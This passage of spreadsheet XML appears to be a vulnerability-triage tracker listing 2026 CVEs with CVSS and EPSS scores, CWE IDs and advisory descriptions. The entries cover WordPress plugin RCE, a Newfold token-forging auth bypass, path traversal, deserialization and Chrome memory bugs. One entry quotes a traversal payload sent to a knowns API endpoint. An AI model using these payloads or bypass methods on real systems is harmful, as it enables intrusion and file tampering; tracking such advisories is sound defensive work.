          <t>CWE-862</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>The storage endpoint /storage/upload of cjbi admin3 v3.0.0 are missing permission checks. /Any logged-in user can upload arbitrary files, and any anonymous attacker can download them.</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75339</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76801</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>The FireBox – WooCommerce Popup Builder, Exit Intent Popup, Email Optin &amp; Cart Abandonment plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.1.10 via the value function. This is due to a trivially bypassable regex blacklist in Executer::allowedToRun() that fails to block WordPress core functions such as wp_insert_user, update_option, and file_put_contents, combined with no sanitization of PHP condition rule values stored via the firebox_meta REST endpoint. This makes it possible for authenticated attackers, with author-level access and above, to execute code on the server. On sites upgraded from a version prior to 3.1.10, the Migrator::preserveCampaignRoleAccess() function automatically grants the edit_fireboxes and publish_fireboxes capabilities to the Author role, lowering the effective entry point to Author-level access.</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76801</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79423</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>An authenticated remote code execution (RCE) vulnerability in the admin_config.php component of seacms v13.6 allows attackers to execute arbitrary code via a crafted POST request.</t>
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79423</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80099</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>Several Newfold plugins are vulnerable to Authentication Bypass. The vulnerability exists because the plugins bundle the wp-module-data module. In the module, the `authenticate()` method — registered on the `rest_authentication_errors` filter and therefore evaluated for every unauthenticated REST API request — performs an HMAC-style Bearer token comparison that degenerates when `HiiveConnection::get_auth_token()` returns `false`: PHP coerces `strrev(false)` to `strrev('')`, collapsing the secret salt to the publicly known constant `hash('sha256', '') = e3b0c44...`, while all remaining hash inputs (HTTP method, request URL, raw request body, and the `X-Timestamp` header) remain fully attacker-controlled. This makes it possible for unauthenticated attackers to compute a valid Bearer token entirely offline, pass the token equality check, and have `wp_set_current_user()` invoked against the first administrator returned by `get_users(['role' =&gt; 'administrator'])`, granting full administrator-level access and enabling arbitrary REST API operations such as creating new administrator accounts and achieving complete site takeover. Vulnerable versions are WP Plugin Crazy Domains (&lt;= 2.5.2), WP Plugin Web (&lt;= 2.3.4), WP Plugin Hostgator (&lt;= 3.1.0), WP Plugin Bluehost (&lt;= 4.17.1). The affected module is vulnerable in versions up to, and including, 2.9.4.</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80099</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80130</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80130</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80914</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198"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S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80914</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80921</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: vsie: zero stale crypto bits
When shadowing crypto access bits from a format0 apcb (crycb 0 or 1),
the bits 64..255 are unchanged from whatever is in the vsie page in the
crycb and thus in the apcb. This gives a nested guest potential access
to a device no longer available. Zero out the remaining bits.</t>
        </is>
      </c>
      <c r="S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80921</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82089</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>The wallabag (aka fr.gaulupeau.apps.InThePoche) application through 2.6.0 for Android allows XSS because /api/entries data is loaded into a WebView.</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82089</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86099</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>Chainlit through 2.12.0 fails to validate the client-supplied socket.io sessionId parameter, allowing unauthenticated attackers to traverse filesystem paths by injecting absolute or relative path sequences. Attackers can craft malicious sessionId values that escape the upload directory and recursively delete arbitrary directories accessible to the service process.</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86099</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86404</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>EAP's Artemis deserialization configuration permits deserialization by default. ObjectMessage.getObject() uses ObjectInputStreamWithClassLoader, which implements allow-list/block-list filtering via its checkSecurity()/isTrustedType() method. However, by default both allow-list and block-list are empty. When the allow-list is empty (size == 0), isTrustedType() returns true for ALL classes. This means all classes are deserializable by default.</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86404</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86482</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 unchecked group membership changes allowed privilege escalation</t>
        </is>
      </c>
      <c r="S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86482</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86775</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>knowns (npm package) versions &lt;= 0.29.1 contain a path traversal vulnerability in the Document API. The HTTP handler in internal/server/routes/docs.go normalizes the user-supplied document path with cleanDocPath(), which strips leading/trailing slashes and the .md suffix but does not neutralize ../ traversal sequences, and internal/storage/doc_store.go then builds the target path with filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md") without verifying that the resolved path remains inside the documents directory. In the default deployment, where the Management API is unauthenticated and bound to all interfaces, a remote unauthenticated attacker can supply a traversal payload (for example {"path": "../../../../tmp/knowns_pwn_marker"} to POST /api/docs, or an encoded path to GET /api/docs/...) to read, create, overwrite, or delete arbitrary files with a .md extension anywhere on the host filesystem and to create arbitrary directories via os.MkdirAll. This can expose sensitive data stored in other projects' documentation, corrupt or destroy files, and provide an arbitrary-write primitive that may be chained toward code execution. The issue is fixed in version 0.30.0.</t>
        </is>
      </c>
      <c r="S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86775</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87430</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87430</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87433</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>Race condition in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87433</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87440</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87440</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87444</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>Memory corruption in Codecs in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87444</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87460</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>Use after free in Platform in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87460</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
